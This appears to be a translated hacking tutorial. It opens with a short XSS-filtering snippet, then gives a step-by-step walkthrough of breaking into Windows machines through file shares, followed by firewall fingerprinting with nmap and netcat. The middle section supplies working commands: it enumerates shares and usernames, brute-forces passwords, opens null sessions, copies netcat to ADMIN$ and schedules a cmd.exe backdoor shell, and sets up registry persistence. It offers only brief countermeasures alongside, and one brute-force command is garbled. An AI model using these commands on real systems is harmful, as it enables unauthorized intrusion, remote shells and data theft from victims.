Naturally you can apply the same method in other web application languages (ASP, PHP, ...). To check the filtering and encoding of data before it is printed, you can use a program written in PHP that was specifically designed to guard against XSS flaws; you can get its source from http://www.mricon.com/html/phpfilter.html. Filtering and encoding data is still the best defence against XSS, but if you are running mod_perl on Apache you can use the Apache::TaintRequest module directly. The program source then looks like this:

Code:
use Apache::TaintRequest;

my $apr = Apache::TaintRequest->new(Apache->request);
my $text = $apr->param('text');
$apr->content_type("text/html");
$apr->send_http_header;
# keep only letters, digits and spaces before the value reaches the page
$text =~ s/[^A-Za-z0-9 ]//g;
$apr->print("You entered ", $text);

The XSS technique was first described two years ago, and most of its potential is known. However, we have only fixed part of it. It is no accident that Yahoo Mail let an XSS flaw slip through its filter. An optimal method is still ahead of us.

Hacking PC resource shares - directions and solutions

Now let's think about the directions to take. When you are online (that is, connected to the Internet) your ISP assigns you some IP. So can a hacker learn your IP? The answer is yes (if the hacker communicates with you, your machine and the hacker's machine have a connection, meaning they exchange packets, and the source IP address can be read from those packets).

Knowing your IP, can a hacker break into your computer? The answer is absolutely yes. So how does the hacker go about it?

Hacking through resource shares:

A hacker can use automated hacking tools, for example ent3 or legion (but all these tools do is carry out the steps I describe below automatically, which is why using them is a rather inelegant way to go about it). First the hacker checks which resources are shared on your computer, with just a few simple lines on the command line:

CODE

C:\>net view \\x.x.x.x        (where x.x.x.x is your IP address, which the hacker knows)
Shared resources at \\x.x.x.x

Share name   Type   Used as   Comment
-------------------------------------------------------------------------------
C            Disk
PRJA3        Disk
The command completed successfully.

C:\>

With Windows 95 and 98 the chance of being hacked is much higher than with Windows NT, 2000, or XP (because Win 95/98 use the FAT and FAT32 formats, whose security is far weaker than NTFS).

On these two versions of Windows (95, 98) the hacker does not even need Administrator to do everything (can you believe it?). Recommendation: do not use these two versions of Windows, because they are too outdated and can be hacked at any moment.

After listing the shared drives and folders, the hacker's next step is to access them to get at the data (which is the hacker's goal). The hacker maps the shared drive or folder in order to access it, again from the command line:

CODE

C:\> net use z: \\x.x.x.x\share
The command completed successfully.

Is hacking really that simple? No, it is not that simple at all, because the victim's machine has a password set (mapping the share requires knowing the username and password). So does the hacker give up? No, a hacker never gives up; the hacker will try to obtain the username and password. Getting the username:

CODE

C:\>nbtstat -A x.x.x.x

NetBIOS Remote Machine Name Table

    Name               Type         Status
    ---------------------------------------------
    ADMIN              UNIQUE       Registered
    BODY               GROUP        Registered
    ADMIN f            UNIQUE       Registered
    BODY               GROUP        Registered
    BODY               UNIQUE       Registered
    ..__MSBROWSE__.    GROUP        Registered

MAC Address = 00-08-A1-5B-E3-8C

So machine x.x.x.x has 2 usernames: ADMIN and BODY. Once the hacker has a username, the hacker proceeds to crack the password (relying on tools such as pqwak or xIntruder). Or the hacker builds a dictionary (based on the hacker's own guesswork) named pass.txt:

CODE

ADMIN 123456 ADMIN 123456 BODY BODY

Then the hacker cracks with the command: One can also create userlist.txt and passlist.txt and then use the command:

CODE

C:\> FOR /F %i IN (1,1,254) DO nat u userlist.txt p passlist.txt x.x.x.x.%I>>output.txt

On Windows 2000 and XP the hacker can do nothing without administrator, so the hacker will try by every means to obtain administrator. Once the hacker has admin, the rest is entirely up to the hacker. Recommendation: do not share anything (if you must share, set a reasonably complex password). Now suppose the victim's machine shares nothing at all. What does the hacker do?

In that case the hacker guesses the user and password (using the method above, or tools such as user2sid/sid2user, dumpACL, or SMBGrind), then connects to IPC$ (the default Windows share):

CODE

C:\> net use \\x.x.x.x\IPC$ password /user:administrator
The command completed successfully.

When the user and password cannot be guessed, the hacker can set up a null session to the victim's machine:

CODE

C:\> net use \\x.x.x.x\IPC$ /user:
The command completed successfully

And then, if the victim's permissions are wrong, the consequences are unforeseeable.

Recommendation: Disable NetBIOS (click My Network Places, choose Local Area Connection, choose TCP/IP, then click Properties, choose Advanced, choose WINS and click Disable NetBIOS over TCP/IP); use a firewall to block unnecessary ports; lock accounts after a number of failed logins.

While we are at it, a word about remote control (because many of you have gotten in and then had no idea what to do next).

Suppose you already have the admin username and password of the victim's machine; now set up a session:

CODE

C:\> net use \\x.x.x.x\IPC$ password /user:administrator
The command completed successfully.

Next we need to copy a backdoor over to control the victim's machine. There are many kinds of backdoor, but the one I find best of all is netcat (nc). Copy nc to the victim's machine:

CODE

C:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully. 1 file copies

Start the Schedule service on the victim's machine (only with this service can files be executed on the victim's machine; by default a fresh Windows install runs this service):

CODE

C:\> sc \\x.x.x.x start schedule
service_name : schedule

Now check the time on the victim's machine:

CODE

C:\> net time \\x.x.x.x
Current time at \\10.0.0.31 is 6/29/2005 4:50 AM
The command completed successfully.

Now run netcat so that it listens on port 111:

CODE

C:\>AT \\x.x.x.x 4:55 /interactive c:\windows\nc.exe -L -d -p111 -e cmd.exe
Added a new job with job ID = 1

Wait until 4:55, then try running nc.exe:

CODE

C:\>nc -nvv x.x.x.x 111
(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
Copyright 1985-2001 Microsoft Corp.

C:\windows>

Now do as you please (but do not go wrecking other people's things). The remaining question is how to make netcat start automatically and listen for our commands the next time the victim turns the computer on. You can have netcat start with Windows: create a file netcat.reg (write it in Notepad and save it as .reg) with the following contents:

CODE

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"

Then copy it to the victim's machine and run it! I hope nobody uses this to do damage! Regards

Firewalls + hacker methods + countermeasures

1. Overview of firewalls:

- As far as I know, there are currently 2 kinds of firewall on the market: application proxies and packet filtering gateways.

2. Identifying firewalls

- Most firewalls have certain characteristics; by performing just a few operations such as port scanning, firewalking, and banner grabbing (collecting the introductory text a service sends), a hacker can determine the firewall's type, version, and rules.

- Why do you think identifying the firewall matters? The answer: because once the exact information about the firewall is known, its weaknesses can be exploited.

a. Direct scanning - the blatant technique

+ How it is done
- The simplest way to find a firewall is to scan its default ports. As far as I know, a few firewalls on the market identify themselves through a port scan; we only need to know which ports to scan. For example, Microsoft Proxy Server listens on TCP ports 1080 and 1745, etc.

So, to find the firewall we use nmap as simply as this:

nmap -n -vv -P0 -p256,1080,1745 192.168.50.1-60.250

From clumsy attackers to seasoned ones, all of them use broad scans of your network to identify firewalls. The dangerous hackers, however, scan ports as quietly and discreetly as possible. Hackers can use many techniques to escape our detection, including random pings and more. Intrusion detection systems (IDS) cannot detect port scans that use such sophisticated evasion techniques, because by default they are configured to watch only for the most blatant port scans.

Unless we configure the IDS properly, the port scan will proceed quietly and quickly. We can reproduce such scanning behaviour ourselves using scripts available on many websites, such as www.hackingexposed.com

*** Countermeasures ***

If you use RealSecure 3.0 you can do the following:

- RealSecure 3.0 can detect port scans, but we need to raise its sensitivity, using these changes:
  - Choose Network Engine Policy
  - Find "Port Scan" and choose the Options button
  - Change Ports to 5 ports
  - Change Delta to 60 seconds

- To prevent the firewall from being port-scanned from the Internet we need to block these ports on the routers in front of the firewall. Where those devices are managed by the ISP, we have to contact them.

b. Route tracking - Using traceroute to identify a firewall on a network is a quieter and subtler method. We can use traceroute on UNIX and tracert.exe on Windows NT to find the path to the target. Linux traceroute has the -I option, which traces the route by sending ICMP packets:

[vtt]$ traceroute -I 192.168.51.100
traceroute to 192.168.51.101 (192.168.51.100), 30 hops max, 40 byte packets
 1  attack-gw (192.168.50.21)  5.801 ms  5.105 ms  5.445 ms
 2  gw1.smallisp.net (192.168.51.1)
....
15  192.168.51.101 (192.168.51.100)

3. Banner grabbing

- Port scanning is a very effective way to identify a firewall, but only Checkpoint and Microsoft listen on default ports; most firewalls do not, so we have to infer more. Many common firewalls announce their presence whenever you connect to them. By connecting to an address, we can learn the firewall's function, type, and version. For example, when we use netcat to connect to a machine suspected of running a firewall on port 21 (FTP), we may see some interesting information like this:

c:\>nc -v -n 192.168.51.129 21
(unknown) [192.168.51.129] 21 (?) open
220 Secure Gateway FTP server ready

- The banner "Secure Gateway FTP server ready" is the mark of an old Eagle Raptor firewall. To be more certain, we can connect to port 23 (telnet):

C:\>nc -v -n 192.168.51.129 23
(unknown) [192.168.51.129] 23 (?) open
Eagle Secure Gateway.
Hostname:

- Finally, if we are still not sure, we can use netcat on port 25 (SMTP):

C:\>nc -v -n 192.168.51.129 25
(unknown) [192.168.51.129] 25 (?) open
421 fw3.acme.com Sorry, the firewall does not provide mail service to you

- With the information and values gathered from the banners, a hacker can exploit the firewall's (previously discovered) weaknesses to attack it.

Countermeasures

- As I understand it, the countermeasure is to minimize the banner information, which depends heavily on the firewall vendor. We can keep the firewall from leaking too much information by regularly editing the banner configuration files. You should consult your vendor's documentation for this.

4. Port identification

A few firewalls have an "identifying mark" that distinguishes them from other firewalls: they display a series of numbers. CheckPoint Firewall, for example, does this when you connect to TCP port 257, which it uses for SNMP management. The presence of ports 256 to 259 on a system is itself a sign that CheckPoint Firewall-1 is there; we can test it like this:

[vtt]# nc -v -n 192.168.51.1 257
(unknown) [192.168.51.1] 257 (?) open
30000003

[vtt]# nc -v -n 172.29.11.191 257
(unknown) [172.29.11.191] 257 (?) open
30000000
